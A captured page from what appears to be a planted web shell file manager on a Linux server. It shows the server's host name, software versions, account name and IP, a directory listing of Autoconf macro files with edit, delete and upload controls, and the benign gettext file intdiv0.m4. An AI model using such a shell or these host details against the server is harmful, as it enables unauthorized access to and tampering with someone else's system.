[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
aclocal
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 bison-i18n.m4
1,924 B
SET
[ EDIT ]
|
[ DEL ]
📄 codeset.m4
842 B
SET
[ EDIT ]
|
[ DEL ]
📄 dovecot-pigeonhole.m4
1,895 B
SET
[ EDIT ]
|
[ DEL ]
📄 extern-inline.m4
4,368 B
SET
[ EDIT ]
|
[ DEL ]
📄 fcntl-o.m4
4,668 B
SET
[ EDIT ]
|
[ DEL ]
📄 fontutil.m4
14,160 B
SET
[ EDIT ]
|
[ DEL ]
📄 freetype2.m4
6,333 B
SET
[ EDIT ]
|
[ DEL ]
📄 gettext.m4
15,859 B
SET
[ EDIT ]
|
[ DEL ]
📄 glibc2.m4
830 B
SET
[ EDIT ]
|
[ DEL ]
📄 glibc21.m4
907 B
SET
[ EDIT ]
|
[ DEL ]
📄 gpg-error.m4
4,757 B
SET
[ EDIT ]
|
[ DEL ]
📄 gpgrt.m4
4,717 B
SET
[ EDIT ]
|
[ DEL ]
📄 iconv.m4
9,274 B
SET
[ EDIT ]
|
[ DEL ]
📄 intdiv0.m4
2,411 B
SET
[ EDIT ]
|
[ DEL ]
📄 intl.m4
12,120 B
SET
[ EDIT ]
|
[ DEL ]
📄 intldir.m4
917 B
SET
[ EDIT ]
|
[ DEL ]
📄 intlmacosx.m4
2,533 B
SET
[ EDIT ]
|
[ DEL ]
📄 intmax.m4
1,123 B
SET
[ EDIT ]
|
[ DEL ]
📄 inttypes-pri.m4
1,253 B
SET
[ EDIT ]
|
[ DEL ]
📄 inttypes_h.m4
1,020 B
SET
[ EDIT ]
|
[ DEL ]
📄 lcmessage.m4
1,365 B
SET
[ EDIT ]
|
[ DEL ]
📄 lib-ld.m4
3,683 B
SET
[ EDIT ]
|
[ DEL ]
📄 lib-link.m4
33,059 B
SET
[ EDIT ]
|
[ DEL ]
📄 lib-prefix.m4
8,466 B
SET
[ EDIT ]
|
[ DEL ]
📄 libgcrypt.m4
6,237 B
SET
[ EDIT ]
|
[ DEL ]
📄 libtool.m4
305,862 B
SET
[ EDIT ]
|
[ DEL ]
📄 libxml.m4
7,881 B
SET
[ EDIT ]
|
[ DEL ]
📄 libxslt.m4
8,119 B
SET
[ EDIT ]
|
[ DEL ]
📄 lock.m4
1,463 B
SET
[ EDIT ]
|
[ DEL ]
📄 longlong.m4
4,739 B
SET
[ EDIT ]
|
[ DEL ]
📄 ltargz.m4
2,569 B
SET
[ EDIT ]
|
[ DEL ]
📄 ltdl.m4
30,030 B
SET
[ EDIT ]
|
[ DEL ]
📄 ltoptions.m4
14,514 B
SET
[ EDIT ]
|
[ DEL ]
📄 ltsugar.m4
4,384 B
SET
[ EDIT ]
|
[ DEL ]
📄 ltversion.m4
699 B
SET
[ EDIT ]
|
[ DEL ]
📄 lt~obsolete.m4
6,140 B
SET
[ EDIT ]
|
[ DEL ]
📄 mysql.m4
4,221 B
SET
[ EDIT ]
|
[ DEL ]
📄 nls.m4
1,223 B
SET
[ EDIT ]
|
[ DEL ]
📄 pkg.m4
12,670 B
SET
[ EDIT ]
|
[ DEL ]
📄 po.m4
18,969 B
SET
[ EDIT ]
|
[ DEL ]
📄 printf-posix.m4
1,579 B
SET
[ EDIT ]
|
[ DEL ]
📄 progtest.m4
3,092 B
SET
[ EDIT ]
|
[ DEL ]
📄 size_max.m4
3,064 B
SET
[ EDIT ]
|
[ DEL ]
📄 stdint_h.m4
995 B
SET
[ EDIT ]
|
[ DEL ]
📄 threadlib.m4
15,151 B
SET
[ EDIT ]
|
[ DEL ]
📄 uintmax_t.m4
1,113 B
SET
[ EDIT ]
|
[ DEL ]
📄 visibility.m4
3,351 B
SET
[ EDIT ]
|
[ DEL ]
📄 wchar_t.m4
818 B
SET
[ EDIT ]
|
[ DEL ]
📄 wint_t.m4
1,053 B
SET
[ EDIT ]
|
[ DEL ]
📄 xsize.m4
406 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: intdiv0.m4
# intdiv0.m4 serial 6 (gettext-0.18.2) dnl Copyright (C) 2002, 2007-2008, 2010-2016 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, dnl with or without modifications, as long as this notice is preserved. dnl From Bruno Haible. AC_DEFUN([gt_INTDIV0], [ AC_REQUIRE([AC_PROG_CC])dnl AC_REQUIRE([AC_CANONICAL_HOST])dnl AC_CACHE_CHECK([whether integer division by zero raises SIGFPE], gt_cv_int_divbyzero_sigfpe, [ gt_cv_int_divbyzero_sigfpe= changequote(,)dnl case "$host_os" in macos* | darwin[6-9]* | darwin[1-9][0-9]*) # On Mac OS X 10.2 or newer, just assume the same as when cross- # compiling. If we were to perform the real test, 1 Crash Report # dialog window would pop up. case "$host_cpu" in i[34567]86 | x86_64) gt_cv_int_divbyzero_sigfpe="guessing yes" ;; esac ;; esac changequote([,])dnl if test -z "$gt_cv_int_divbyzero_sigfpe"; then AC_RUN_IFELSE( [AC_LANG_SOURCE([[ #include <stdlib.h> #include <signal.h> static void sigfpe_handler (int sig) { /* Exit with code 0 if SIGFPE, with code 1 if any other signal. */ _exit (sig != SIGFPE); } int x = 1; int y = 0; int z; int nan; int main () { signal (SIGFPE, sigfpe_handler); /* IRIX and AIX (when "xlc -qcheck" is used) yield signal SIGTRAP. */ #if (defined (__sgi) || defined (_AIX)) && defined (SIGTRAP) signal (SIGTRAP, sigfpe_handler); #endif /* Linux/SPARC yields signal SIGILL. */ #if defined (__sparc__) && defined (__linux__) signal (SIGILL, sigfpe_handler); #endif z = x / y; nan = y / y; exit (2); } ]])], [gt_cv_int_divbyzero_sigfpe=yes], [gt_cv_int_divbyzero_sigfpe=no], [ # Guess based on the CPU. changequote(,)dnl case "$host_cpu" in alpha* | i[34567]86 | x86_64 | m68k | s390*) gt_cv_int_divbyzero_sigfpe="guessing yes";; *) gt_cv_int_divbyzero_sigfpe="guessing no";; esac changequote([,])dnl ]) fi ]) case "$gt_cv_int_divbyzero_sigfpe" in *yes) value=1;; *) value=0;; esac AC_DEFINE_UNQUOTED([INTDIV0_RAISES_SIGFPE], [$value], [Define if integer division by zero raises signal SIGFPE.]) ])